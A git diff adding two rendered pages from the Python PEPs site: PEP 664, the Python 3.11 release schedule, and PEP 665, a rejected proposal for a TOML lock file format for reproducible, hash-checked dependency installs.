+ + + + + \ No newline at end of file diff --git a/pep-0664/index.html b/pep-0664/index.html new file mode 100644 index 00000000000..c1142e36611 --- /dev/null +++ b/pep-0664/index.html @@ -0,0 +1,246 @@ + + + + + + + + PEP 664 – Python 3.11 Release Schedule | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 664 – Python 3.11 Release Schedule

+
+
Author:
+
Pablo Galindo Salgado <pablogsal at python.org>
+
Status:
+
Active
+
Type:
+
Informational
+
Topic:
+
Release
+
Created:
+
12-Jul-2021
+
Python-Version:
+
3.11
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes the development and release schedule for +Python 3.11. The schedule primarily concerns itself with PEP-sized +items.

+
+
+

Release Manager and Crew

+
    +
  • 3.11 Release Manager: Pablo Galindo Salgado
  • +
  • Windows installers: Steve Dower
  • +
  • Mac installers: Ned Deily
  • +
  • Documentation: Julien Palard
  • +
+
+
+

Release Schedule

+
+

3.11.0 schedule

+

Note: the dates below use a 17-month development period that results +in a 12-month release cadence between feature versions, as defined by +PEP 602.

+

Actual:

+
    +
  • 3.11 development begins: Monday, 2021-05-03
  • +
  • 3.11.0 alpha 1: Tuesday, 2021-10-05
  • +
  • 3.11.0 alpha 2: Tuesday, 2021-11-02
  • +
  • 3.11.0 alpha 3: Wednesday, 2021-12-08
  • +
  • 3.11.0 alpha 4: Friday, 2022-01-14
  • +
  • 3.11.0 alpha 5: Thursday, 2022-02-03
  • +
  • 3.11.0 alpha 6: Monday, 2022-03-07
  • +
  • 3.11.0 alpha 7: Tuesday, 2022-04-05
  • +
  • 3.11.0 beta 1: Sunday, 2022-05-08 +(No new features beyond this point.)
  • +
  • 3.11.0 beta 2: Tuesday, 2022-05-31
  • +
  • 3.11.0 beta 3: Wednesday, 2022-06-01
  • +
  • 3.11.0 beta 4: Monday, 2022-07-11
  • +
  • 3.11.0 beta 5: Tuesday, 2022-07-26
  • +
  • 3.11.0 candidate 1: Monday, 2022-08-08
  • +
  • 3.11.0 candidate 2: Monday, 2022-09-12
  • +
  • 3.11.0 final: Monday, 2022-10-24
  • +
+
+
+

Bugfix releases

+

Actual:

+
    +
  • 3.11.1: Tuesday, 2022-12-06
  • +
  • 3.11.2: Wednesday, 2023-02-08
  • +
  • 3.11.3: Wednesday, 2023-04-05
  • +
  • 3.11.4: Tuesday, 2023-06-06
  • +
  • 3.11.5: Thursday, 2023-08-24
  • +
  • 3.11.6: Monday, 2023-10-02
  • +
  • 3.11.7: Monday, 2023-12-04
  • +
  • 3.11.8: Tuesday, 2024-02-06
  • +
  • 3.11.9: Tuesday, 2024-04-02 (final regular bugfix release with binary +installers)
  • +
+
+
+

Source-only security fix releases

+

Provided irregularly on an “as-needed” basis until October 2027.

+
    +
  • 3.11.10: Saturday, 2024-09-07
  • +
  • 3.11.11: Tuesday, 2024-12-03
  • +
+
+
+

3.11 Lifespan

+

3.11 will receive bugfix updates approximately every 2 months for +approximately 18 months. Some time after the release of 3.12.0 final, +the ninth and final 3.11 bugfix update will be released. After that, +it is expected that security updates (source only) will be released +until 5 years after the release of 3.11.0 final, so until approximately +October 2027.

+
+
+
+

Features for 3.11

+

Some of the notable features of Python 3.11 include:

+
    +
  • PEP 654, Exception Groups and except*.
  • +
  • PEP 657, Enhanced error locations in tracebacks.
  • +
  • PEP 680, Support for parsing TOML in the standard library
  • +
  • Python 3.11 is up to 10-60% faster than Python 3.10. On average, we measured +a 1.25x speedup on the standard benchmark suite. See Faster CPython for +details.
  • +
+

Typing features:

+
    +
  • PEP 646, Variadic generics.
  • +
  • PEP 655, Marking individual TypedDict items as required or potentially-missing.
  • +
  • PEP 673, Self type.
  • +
  • PEP 675, Arbitrary literal string type.
  • +
  • PEP 681, Dataclass transforms
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0664.rst

+

Last modified: 2024-12-05 19:08:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0665/index.html b/pep-0665/index.html new file mode 100644 index 00000000000..43c359e7bbc --- /dev/null +++ b/pep-0665/index.html @@ -0,0 +1,1030 @@ + + + + + + + + PEP 665 – A file format to list Python dependencies for reproducibility of an application | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 665 – A file format to list Python dependencies for reproducibility of an application

+
+
Author:
+
Brett Cannon <brett at python.org>, +Pradyun Gedam <pradyunsg at gmail.com>, +Tzu-ping Chung <uranusjr at gmail.com>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
29-Jul-2021
+
Post-History:
+
29-Jul-2021, 03-Nov-2021, 25-Nov-2021
+
Superseded-By:
+
751
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Note

+

This PEP was rejected due to lukewarm reception from the community +from the lack of source distribution support.

+
+
+

Abstract

+

This PEP specifies a file format to specify the list of Python package +installation requirements for an application, and the relation between +the specified requirements. The list of requirements is considered +exhaustive for the installation target, and thus not requiring any +information beyond the platform being installed for, and the file +itself. The file format is flexible enough to allow installing the +requirements across different platforms, which allows for +reproducibility on multiple platforms from the same file.

+
+
+

Terminology

+

There are several terms whose definition must be agreed upon in order +to facilitate a discussion on the topic of this PEP.

+

A package is something you install as a dependency and use via the +import system. The packages on PyPI are an example of this.

+

An application or app is an end product that other external code +does not directly rely on via the import system (i.e. they are +standalone). Desktop applications, command-line tools, etc. are +examples of applications.

+

A lock file records the packages that are to be installed for an +app. Traditionally, the exact version of the package to be installed +is specified by a lock file, but specified packages are not always +installed on a given platform (according a filtering logic described +in a later section), which enables the lock file to describe +reproducibility across multiple platforms. Examples of this are +package-lock.json from npm, Poetry.lock from Poetry, etc.

+

Locking is the act of taking the input of the packages an app +depends on and producing a lock file from that.

+

A locker is a tool which produces a lock file.

+

An installer consumes a lock file to install what the lock file +specifies.

+
+
+

Motivation

+

Applications want reproducible installs for a few reasons (we are not +worrying about package development, integration into larger systems +that would handle locking dependencies external to the Python +application, or other situations where flexible installation +requirements are desired over strict, reproducible installations).

+

One, reproducibility eases development. When you and your fellow +developers all end up with the same files on a specific platform, you +make sure you are all developing towards the same experience for the +application. You also want your users to install the same files as +you expect to guarantee the experience is the same as you developed +for them.

+

Two, you want to be able to reproduce what gets installed across +multiple platforms. Thanks to Python’s portability across operating +systems, CPUs, etc., it is very easy and often desirable to create +applications that are not restricted to a single platform. Thus, you +want to be flexible enough to allow for differences in your package +dependencies between platforms, while still having consistency +and reproducibility on any one specific platform.

+

Three, reproducibility is more secure. When you control exactly what +files are installed, you can make sure no malicious actor is +attempting to slip nefarious code into your application (i.e. some +supply chain attacks). By using a lock file which always leads to +reproducible installs, we can avoid certain risks entirely.

+

Four, relying on the wheel file format provides reproducibility +without requiring build tools to support reproducibility themselves. +Thanks to wheels being static and not executing code as part of +installation, wheels always lead to a reproducible result. Compare +this to source distributions (aka sdists) or source trees which only +lead to a reproducible install if their build tool supports +reproducibility due to inherent code execution. Unfortunately the vast +majority of build tools do not support reproducible builds, so this +PEP helps alleviate that issue by only supporting wheels as a package +format.

+

This PEP proposes a standard for a lock file, as the current solutions +don’t meet the outlined goals. Today, the closest we come to a lock +file standard is the requirements file format from pip. +Unfortunately, that format does not lead to inherently reproducible +installs (it requires optional features both in the requirements file +and the installer itself, to be discussed later).

+

The community itself has also shown a need for lock files based on the +fact that multiple tools have independently created their own lock +file formats:

+
    +
  1. PDM
  2. +
  3. pip-tools
  4. +
  5. Pipenv
  6. +
  7. Poetry
  8. +
  9. Pyflow
  10. +
+

Unfortunately, those tools all use differing lock file formats. This +means tooling around these tools must be unique. This impacts tooling +such as code editors and hosting providers, which want to be as +flexible as possible when it comes to accepting a user’s application +code, but also have a limit as to how much development resources they +can spend to add support for yet another lock file format. A +standardized format would allow tools to focus their work on a single +target, and make sure that workflow decisions made by developers +outside of the lock file format are of no concern to e.g. hosting +providers.

+

Other programming language communities have also shown the usefulness +of lock files by developing their own solution to this problem. Some +of those communities include:

+
    +
  1. Dart
  2. +
  3. npm/Node
  4. +
  5. Go
  6. +
  7. Rust
  8. +
+

The trend in programming languages in the past decade seems to have +been toward providing a lock file solution.

+
+
+

Rationale

+
+

File Format

+

We wanted the file format to be easy to read as a diff when auditing +a change to the lock file. As such, and thanks to PEP 518 and +pyproject.toml, we decided to go with the TOML file format.

+
+
+

Secure by Design

+

Viewing the requirements file format as the closest we have to +a lock file standard, there are a few issues with the file format when +it comes to security. First is that the file format simply does not +require you to specify the exact version of a package. This is why +tools like pip-tools exist to help manage that users of +requirements files.

+

Second, you must opt into specifying what files are acceptable to be +installed by using the --hash argument for a specific dependency. +This is also optional with pip-tools as it requires specifying the +--generate-hashes CLI argument. This requires --require-hashes +for pip to make sure no dependencies lack a hash to check.

+

Third, even when you control what files may be installed, it does not +prevent other packages from being installed. If a dependency is not +listed in the requirements file, pip will happily go searching for a +file to meet that need. You must specify --no-deps as an +argument to pip to prevent unintended dependency resolution outside +of the requirements file.

+

Fourth, the format allows for installing a +source distribution file (aka “sdist”). By its very nature, +installing an sdist requires executing arbitrary Python code, meaning +that there is no control over what files may be installed. Only by +specifying --only-binary :all: can you guarantee pip to only use a +wheel file for each package.

+

To recap, in order for a requirements file to be as secure as what is +being proposed, a user should always do the following steps:

+
    +
  1. Use pip-tools and its command pip-compile --generate-hashes
  2. +
  3. Install the requirements file using +pip install --require-hashes --no-deps --only-binary :all:
  4. +
+

Critically, all of those flags, and both the specificity and +exhaustion of what to install that pip-tools provides, are optional +for requirements files.

+

As such, the proposal raised in this PEP is secure by design which +combats some supply chain attacks. Hashes for files which would be +used to install from are required. You can only install from +wheels to unambiguously define what files will be placed in the file +system. Installers must lead to an deterministic installation +from a lock file for a given platform. All of this leads to a +reproducible installation which you can deem trustworthy (when you +have audited the lock file and what it lists).

+
+
+

Cross-Platform

+

Various projects which already have a lock file, like PDM and +Poetry, provide a lock file which is cross-platform. This allows +for a single lock file to work on multiple platforms while still +leading to the exact same top-level requirements to be installed +everywhere with the installation being consistent/unambiguous on +each platform.

+

As to why this is useful, let’s use an example involving PyWeek +(a week-long game development competition). Assume you are developing +on Linux, while someone you choose to partner with is using macOS. +Now assume the judges are using Windows. How do you make sure everyone +is using the same top-level dependencies, while allowing for any +platform-specific requirements (e.g. a package requires a helper +package under Windows)?

+

With a cross-platform lock file, you can make sure that the key +requirements are met consistently across all platforms. You can then +also make sure that all users on the same platform get the same +reproducible installation.

+
+
+

Simple Installer

+

The separation of concerns between a locker and an installer allows +for an installer to have a much simpler operation to perform. As +such, it not only allows for installers to be easier to write, but +facilitates in making sure installers create unambiguous, reproducible +installations correctly.

+

The installer can also expend less computation/energy in creating the +installation. This is beneficial not only for faster installs, but +also from an energy consumption perspective, as installers are +expected to be run more often than lockers.

+

This has led to a design where the locker must do more work upfront +to the benefit installers. It also means the complexity of package +dependencies is simpler and easier to comprehend in a lock files to +avoid ambiguity.

+
+
+
+

Specification

+
+

Details

+

Lock files MUST use the TOML file format. This not only prevents the +need to have another file format in the Python packaging ecosystem +thanks to its adoption by PEP 518 for pyproject.toml, but also +assists in making lock files more human-readable.

+

Lock files MUST end their file names with .pylock.toml. The +.toml part unambiguously distinguishes the format of the file, +and helps tools like code editors support the file appropriately. The +.pylock part distinguishes the file from other TOML files the user +has, to make the logic easier for tools to create functionality +specific to Python lock files, instead of TOML files in general.

+

The following sections are the top-level keys of the TOML file data +format. Any field not listed as required is considered optional.

+
+

version

+

This field is required.

+

The version of the lock file being used. The key MUST be a string +consisting of a number that follows the same formatting as the +Metadata-Version key in the core metadata spec.

+

The value MUST be set to "1.0" until a future PEP allows for a +different value. The introduction of a new optional key to the file +format SHOULD increase the minor version. The introduction of a new +required key or changing the format MUST increase the major version. +How to handle other scenarios is left as a per-PEP decision.

+

Installers MUST warn the user if the lock file specifies a version +whose major version is supported but whose minor version is +unsupported/unrecognized (e.g. the installer supports "1.0", but +the lock file specifies "1.1").

+

Installers MUST raise an error if the lock file specifies a major +version which is unsupported (e.g. the installer supports "1.9" +but the lock file specifies "2.0").

+
+
+

created-at

+

This field is required.

+

The timestamp for when the lock file was generated (using TOML’s +native timestamp type). It MUST be recorded using the UTC time zone to +avoid ambiguity.

+

If the SOURCE_DATE_EPOCH environment variable is set, it MUST be used +as the timestamp by the locker. This facilitates reproducibility of +the lock file itself.

+
+
+

[tool]

+

Tools may create their own sub-tables under the tool table. The +rules for this table match those for pyproject.toml and its +[tool] table from the build system declaration spec.

+
+
+

[metadata]

+

This table is required.

+

A table containing data applying to the overall lock file.

+
+
metadata.marker
+

A key storing a string containing an environment marker as +specified in the dependency specifier spec.

+

The locker MAY specify an environment marker which specifies any +restrictions the lock file was generated under.

+

If the installer is installing for an environment which does not +satisfy the specified environment marker, the installer MUST raise an +error as the lock file does not support the target installation +environment.

+
+
+
metadata.tag
+

A key storing a string specifying platform compatibility tags +(i.e. wheel tags). The tag MAY be a compressed tag set.

+

If the installer is installing for an environment which does not +satisfy the specified tag (set), the installer MUST raise an error +as the lock file does not support the targeted installation +environment.

+
+
+
metadata.requires
+

This field is required.

+

An array of strings following the dependency specifier spec. This +array represents the top-level package dependencies of the lock file +and thus the root of the dependency graph.

+
+
+
metadata.requires-python
+

A string specifying the supported version(s) of Python for this lock +file. It follows the same format as that specified for the +Requires-Python field in the core metadata spec.

+
+
+
+

[[package._name_._version_]]

+

This array is required.

+

An array per package and version containing entries for the potential +(wheel) files to install (as represented by _name_ and +_version_, respectively).

+

Lockers MUST normalize a project’s name according to the +simple repository API. If extras are specified as part of the +project to install, the extras are to be included in the key name and +are to be sorted in lexicographic order.

+

Within the file, the tables for the projects SHOULD be sorted by:

+
    +
  1. Project/key name in lexicographic order
  2. +
  3. Package version, newest/highest to older/lowest according to the +version specifiers spec
  4. +
  5. Optional dependencies (extras) via lexicographic order
  6. +
  7. File name based on the filename field (discussed +below)
  8. +
+

These recommendations are to help minimize diff changes between tool +executions.

+
+
package._name_._version_.filename
+

This field is required.

+

A string representing the base name of the file as represented by an +entry in the array (i.e. what +os.path.basename()/pathlib.PurePath.name represents). This +field is required to simplify installers as the file name is required +to resolve wheel tags derived from the file name. It also guarantees +that the association of the array entry to the file it is meant for is +always clear.

+
+
+
[package._name_._version_.hashes]
+

This table is required.

+

A table with keys specifying a hash algorithm and values as the hash +for the file represented by this entry in the +package._name_._version_ table.

+

Lockers SHOULD list hashes in lexicographic order. This is to help +minimize diff sizes and the potential to overlook hash value changes.

+

An installer MUST only install a file which matches one of the +specified hashes.

+
+
+
package._name_._version_.url
+

A string representing a URL where to get the file.

+

The installer MAY support any schemes it wants for URLs. A URL with no +scheme MUST be assumed to be a local file path (both relative paths to +the lock file and absolute paths). Installers MUST support, at +minimum, HTTPS URLs as well as local file paths.

+

An installer MAY choose to not use the URL to retrieve a file +if a file matching the specified hash can be found using alternative +means (e.g. on the file system in a cache directory).

+
+
+
package._name_._version_.direct
+

A boolean representing whether an installer should consider the +project installed “directly” as specified by the +direct URL origin of installed distributions spec.

+

If the key is true, then the installer MUST follow the +direct URL origin of installed distributions spec for recording +the installation as “direct”.

+
+
+
package._name_._version_.requires-python
+

A string specifying the support version(s) of Python for this file. It +follows the same format as that specified for the +Requires-Python field in the core metadata spec.

+
+
+
package._name_._version_.requires
+

An array of strings following the dependency specifier spec which +represent the dependencies of this file.

+
+
+
+
+

Example

+
version = "1.0"
+created-at = 2021-10-19T22:33:45.520739+00:00
+
+[tool]
+# Tool-specific table.
+
+[metadata]
+requires = ["mousebender", "coveragepy[toml]"]
+marker = "sys_platform == 'linux'"  # As an example for coverage.
+requires-python = ">=3.7"
+
+[[package.attrs."21.2.0"]]
+filename = "attrs-21.2.0-py2.py3-none-any.whl"
+hashes.sha256 = "149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1"
+url = "https://files.pythonhosted.org/packages/20/a9/ba6f1cd1a1517ff022b35acd6a7e4246371dfab08b8e42b829b6d07913cc/attrs-21.2.0-py2.py3-none-any.whl"
+requires-python = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
+
+[[package.attrs."21.2.0"]]
+# If attrs had another wheel file (e.g. that was platform-specific),
+# it could be listed here.
+
+[[package."coveragepy[toml]"."6.2.0"]]
+filename = "coverage-6.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl"
+hashes.sha256 = "c7912d1526299cb04c88288e148c6c87c0df600eca76efd99d84396cfe00ef1d"
+url = "https://files.pythonhosted.org/packages/da/64/468ca923e837285bd0b0a60bd9a287945d6b68e325705b66b368c07518b1/coverage-6.2-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl"
+requires-python = ">=3.6"
+requires = ["tomli"]
+
+[[package."coveragepy[toml]"."6.2.0"]]
+filename = "coverage-6.2-cp310-cp310-musllinux_1_1_x86_64.whl "
+hashes.sha256 = "276651978c94a8c5672ea60a2656e95a3cce2a3f31e9fb2d5ebd4c215d095840"
+url = "https://files.pythonhosted.org/packages/17/d6/a29f2cccacf2315150c31d8685b4842a6e7609279939a478725219794355/coverage-6.2-cp310-cp310-musllinux_1_1_x86_64.whl"
+requires-python = ">=3.6"
+requires = ["tomli"]
+
+# More wheel files for `coverage` could be listed for more
+# extensive support (i.e. all Linux-based wheels).
+
+[[package.mousebender."2.0.0"]]
+filename = "mousebender-2.0.0-py3-none-any.whl"
+hashes.sha256 = "a6f9adfbd17bfb0e6bb5de9a27083e01dfb86ed9c3861e04143d9fd6db373f7c"
+url = "https://files.pythonhosted.org/packages/f4/b3/f6fdbff6395e9b77b5619160180489410fb2f42f41272994353e7ecf5bdf/mousebender-2.0.0-py3-none-any.whl"
+requires-python = ">=3.6"
+requires = ["attrs", "packaging"]
+
+[[package.packaging."20.9"]]
+filename = "packaging-20.9-py2.py3-none-any.whl"
+hashes.blake-256 = "3e897ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af"
+hashes.sha256 = "67714da7f7bc052e064859c05c595155bd1ee9f69f76557e21f051443c20947a"
+url = "https://files.pythonhosted.org/packages/3e/89/7ea760b4daa42653ece2380531c90f64788d979110a2ab51049d92f408af/packaging-20.9-py2.py3-none-any.whl"
+requires-python = ">=3.6"
+requires = ["pyparsing"]
+
+[[package.pyparsing."2.4.7"]]
+filename = "pyparsing-2.4.7-py2.py3-none-any.whl"
+hashes.sha256 = "ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b"
+url = "https://files.pythonhosted.org/packages/8a/bb/488841f56197b13700afd5658fc279a2025a39e22449b7cf29864669b15d/pyparsing-2.4.7-py2.py3-none-any.whl"
+direct = true  # For demonstration purposes.
+requires-python = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*"
+
+[[package.tomli."2.0.0"]]
+filename = "tomli-2.0.0-py3-none-any.whl"
+hashes.sha256 = "b5bde28da1fed24b9bd1d4d2b8cba62300bfb4ec9a6187a957e8ddb9434c5224"
+url = "https://files.pythonhosted.org/packages/e2/9f/5e1557a57a7282f066351086e78f87289a3446c47b2cb5b8b2f614d8fe99/tomli-2.0.0-py3-none-any.whl"
+requires-python = ">=3.7"
+
+
+
+
+

Expectations for Lockers

+

Lockers MUST create lock files for which a topological sort of the +packages which qualify for installation on the specified platform +results in a graph for which only a single version of any package +qualifies for installation and there is at least one compatible file +to install for each package. This leads to a lock file for any +supported platform where the only decision an installer can make +is what the “best-fitting” wheel is to install (which is discussed +below).

+

Lockers are expected to utilize metadata.marker, metadata.tag, +and metadata.requires-python as appropriate as well as environment +markers specified via requires and Python version requirements via +requires-python to enforce this result for installers. Put another +way, the information used in the lock file is not expected to be +pristine/raw from the locker’s input and instead is to be changed as +necessary to the benefit of the locker’s goals.

+
+
+

Expectations for Installers

+

The expected algorithm for resolving what to install is:

+
    +
  1. Construct a dependency graph based on the data in the lock file +with metadata.requires as the starting/root point.
  2. +
  3. Eliminate all files that are unsupported by the specified platform.
  4. +
  5. Eliminate all irrelevant edges between packages based on marker +evaluation for requires.
  6. +
  7. Raise an error if a package version is still reachable from the +root of the dependency graph but lacks any compatible file.
  8. +
  9. Verify that all packages left only have one version to install, +raising an error otherwise.
  10. +
  11. Install the best-fitting wheel file for each package which +remains.
  12. +
+

Installers MUST follow a deterministic algorithm determine what the +“best-fitting wheel file” is. A simple solution for this is to +rely upon the packaging project +and its packaging.tags module to determine wheel file precedence.

+

Installers MUST support installing into an empty environment. +Installers MAY support installing into an environment that already +contains installed packages (and whatever that would entail to be +supported).

+
+
+
+

(Potential) Tool Support

+

The pip team has said +they are interested in supporting this PEP if accepted. The current +proposal for pip may even +supplant the need +for pip-tools.

+

PDM has also said they would +support the PEP +if accepted.

+

Pyflow has said they +“like the idea” +of the PEP.

+

Poetry has said they would not support the PEP as-is because +“Poetry supports sdists files, directory and VCS dependencies which are not supported”. +Recording requirements at the file level, which is on purpose to +better reflect what can occur when it comes to dependencies, +“is contradictory to the design of Poetry”. +This also excludes export support to a this PEP’s lock file as +“Poetry exports the information present in the poetry.lock file into another format” +and sdists and source trees are included in Poetry.lock files. +Thus it is not a clean translation from Poetry’s lock file to this +PEP’s lock file format.

+
+
+

Backwards Compatibility

+

As there is no pre-existing specification regarding lock files, there +are no explicit backwards compatibility concerns.

+

As for pre-existing tools that have their own lock file, some updating +will be required. Most document the lock file name, but not its +contents. For projects which do not commit their lock file to +version control, they will need to update the equivalent of their +.gitignore file. For projects that do commit their lock file to +version control, what file(s) get committed will need an update.

+

For projects which do document their lock file format like pipenv, +they will very likely need a major version release which changes the +lock file format.

+
+
+

Transition Plan

+

In general, this PEP could be considered successful if:

+
    +
  1. Two pre-existing tools became lockers (e.g. pip-tools, PDM, +pip via pip freeze).
  2. +
  3. Pip became an installer.
  4. +
  5. One major, non-Python-specific platform supported the file format +(e.g. a cloud provider).
  6. +
+

This would show interoperability, usability, and programming +community/business acceptance.

+

In terms of a transition plan, there are potentially multiple steps +that could lead to this desired outcome. Below is a somewhat idealized +plan that would see this PEP being broadly used.

+
+

Usability

+

First, a pip freeze equivalent tool could be developed which +creates a lock file. While installed packages do not by themselves +provide enough information to statically create a lock file, a user +could provide local directories and index URLs to construct one. This +would then lead to lock files that are stricter than a requirements +file by limiting the lock file to the current platform. This would +also allow people to see whether their environment would be +reproducible.

+

Second, a stand-alone installer should be developed. As the +requirements on an installer are much simpler than what pip provides, +it should be reasonable to have an installer that is independently +developed.

+

Third, a tool to convert a pinned requirements file as emitted by +pip-tools could be developed. Much like the pip freeze equivalent +outlined above, some input from the user may be needed. But this tool +could act as a transitioning step for anyone who has an appropriate +requirements file. This could also act as a test before potentially +having pip-tools grow some --lockfile flag to use this PEP.

+

All of this could be required before the PEP transitions from +conditional acceptance to full acceptance (and give the community a +chance to test if this PEP is potentially useful).

+
+
+

Interoperability

+

At this point, the goal would be to increase interoperability between +tools.

+

First, pip would become an installer. By having the most widely used +installer support the format, people can innovate on the locker side +while knowing people will have the tools necessary to actually consume +a lock file.

+

Second, pip becomes a locker. Once again, pip’s reach would make the +format accessible for the vast majority of Python users very quickly.

+

Third, a project with a pre-existing lock file format supports at +least exporting to the lock file format (e.g. PDM or Pyflow). This +would show that the format meets the needs of other projects.

+
+
+

Acceptance

+

With the tooling available throughout the community, acceptance would +be shown via those not exclusively tied to the Python community +supporting the file format based on what they believe their users +want.

+

First, tools that operate on requirements files like code editors +having equivalent support for lock files.

+

Second, consumers of requirements files like cloud providers would +also accept lock files.

+

At this point the PEP would have permeated out far enough to be on +par with requirements files in terms of general acceptance and +potentially more if projects had dropped their own lock files for this +PEP.

+
+
+
+

Security Implications

+

A lock file should not introduce security issues but instead help +solve them. By requiring the recording of hashes for files, a lock +file is able to help prevent tampering with code since the hash +details were recorded. Relying on only wheel files means what files +will be installed can be known ahead of time and is reproducible. A +lock file also helps prevent unexpected package updates being +installed which may in turn be malicious.

+
+
+

How to Teach This

+

Teaching of this PEP will very much be dependent on the lockers and +installers being used for day-to-day use. Conceptually, though, users +could be taught that a lock file specifies what should be installed +for a project to work. The benefits of consistency and security should +be emphasized to help users realize why they should care about lock +files.

+
+
+

Reference Implementation

+

A proof-of-concept locker can be found at +https://github.com/frostming/pep665_poc . No installer has been +implemented yet, but the design of this PEP suggests the locker is the +more difficult aspect to implement.

+
+
+

Rejected Ideas

+
+

File Formats Other Than TOML

+

JSON was briefly considered, but due to:

+
    +
  1. TOML already being used for pyproject.toml
  2. +
  3. TOML being more human-readable
  4. +
  5. TOML leading to better diffs
  6. +
+

the decision was made to go with TOML. There was some concern over +Python’s standard library lacking a TOML parser, but most packaging +tools already use a TOML parser thanks to pyproject.toml so this +issue did not seem to be a showstopper. Some have also argued against +this concern in the past by the fact that if packaging tools abhor +installing dependencies and feel they can’t vendor a package then the +packaging ecosystem has much bigger issues to rectify than the need to +depend on a third-party TOML parser.

+
+
+

Alternative Naming Schemes

+

Specifying a directory to install file to was considered, but +ultimately rejected due to people’s distaste for the idea.

+

It was also suggested to not have a special file name suffix, but it +was decided that hurt discoverability by tools too much.

+
+
+

Supporting a Single Lock File

+

At one point the idea of only supporting single lock file which +contained all possible lock information was considered. But it quickly +became apparent that trying to devise a data format which could +encompass both a lock file format which could support multiple +environments as well as strict lock outcomes for +reproducible builds would become quite complex and cumbersome.

+

The idea of supporting a directory of lock files as well as a single +lock file named pyproject-lock.toml was also considered. But any +possible simplicity from skipping the directory in the case of a +single lock file seemed unnecessary. Trying to define appropriate +logic for what should be the pyproject-lock.toml file and what +should go into pyproject-lock.d seemed unnecessarily complicated.

+
+
+

Using a Flat List Instead of a Dependency Graph

+

The first version of this PEP proposed that the lock file have no +concept of a dependency graph. Instead, the lock file would list +exactly what should be installed for a specific platform such that +installers did not have to make any decisions about what to install, +only validating that the lock file would work for the target platform.

+

This idea was eventually rejected due to the number of combinations +of potential PEP 508 environment markers. The decision was made that +trying to have lockers generate all possible combinations as +individual lock files when a project wants to be cross-platform would +be too much.

+
+
+

Use Wheel Tags in the File Name

+

Instead of having the metadata.tag field there was a suggestion +of encoding the tags into the file name. But due to the addition of +the metadata.marker field and what to do when no tags were needed, +the idea was dropped.

+
+
+

Alternative Names for requires

+

Some other names for what became requires were installs, +needs, and dependencies. Initially this PEP chose needs +after asking a Python beginner which term they preferred. But based +on feedback on an earlier draft of this PEP, requires was chosen +as the term.

+
+
+

Accepting PEP 650

+

PEP 650 was an earlier attempt at trying to tackle this problem by +specifying an API for installers instead of standardizing on a lock +file format (ala PEP 517). The +initial response +to PEP 650 could be considered mild/lukewarm. People seemed to be +consistently confused over which tools should provide what +functionality to implement the PEP. It also potentially incurred more +overhead as it would require executing Python APIs to perform any +actions involving packaging.

+

This PEP chooses to standardize around an artifact instead of an API +(ala PEP 621). This would allow for more tool integrations as it +removes the need to specifically use Python to do things such as +create a lock file, update it, or even install packages listed in +a lock file. It also allows for easier introspection by forcing +dependency graph details to be written in a human-readable format. +It also allows for easier sharing of knowledge by standardizing what +people need to know more (e.g. tutorials become more portable between +tools when it comes to understanding the artifact they produce). It’s +also simply the approach other language communities have taken and +seem to be happy with.

+

Acceptance of this PEP would mean PEP 650 gets rejected.

+
+
+

Specifying Requirements per Package Instead of per File

+

An earlier draft of this PEP specified dependencies at the package +level instead of per file. While this has traditionally been how +packaging systems work, it actually did not reflect accurately how +things are specified. As such, this PEP was subsequently updated to +reflect the granularity that dependencies can truly be specified at.

+
+
+

Specify Where Lockers Gather Input

+

This PEP does not specify how a locker gets its input. An initial +suggestion was to partially reuse PEP 621, but due to disagreements +on how flexible the potential input should be in terms of specifying +things such as indexes, etc., it was decided this would best be left +to a separate PEP.

+
+
+

Allowing Source Distributions and Source Trees to be an Opt-In, Supported File Format

+

After extensive discussion, +it was decided that this PEP would not support source distributions +(aka sdists) or source trees as an acceptable format for code. +Introducing sdists and source trees to this PEP would immediately undo +the reproducibility and security goals due to needing to execute code +to build the sdist or source tree. It would also greatly increase +the complexity for (at least) installers as the dynamic build nature +of sdists and source trees means the installer would need to handle +fully resolving whatever requirements the sdists produced dynamically, +both from a building and installation perspective.

+

Due to all of this, it was decided it was best to have a separate +discussion about what supporting sdists and source trees after +this PEP is accepted/rejected. As the proposed file format is +versioned, introducing sdists and source tree support in a later PEP +is doable.

+

It should be noted, though, that this PEP is not stop an +out-of-band solution from being developed to be used in conjunction +with this PEP. Building wheel files from sdists and shipping them with +code upon deployment so they can be included in the lock file is one +option. Another is to use a requirements file just for sdists and +source trees, then relying on a lock file for all wheels.

+
+
+
+

Open Issues

+

None.

+
+
+

Acknowledgments

+

Thanks to Frost Ming of PDM and Sébastien Eustace of Poetry for +providing input around dynamic install-time resolution of PEP 508 +requirements.

+

Thanks to Kushal Das for making sure reproducible builds stayed a +concern for this PEP.

+

Thanks to Andrea McInnes for initially settling the bikeshedding and +choosing the paint colour of needs (at which point people ralled +around the requires colour instead).

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0665.rst

+

Last modified: 2024-07-26 12:58:25 GMT

+ +
+ +
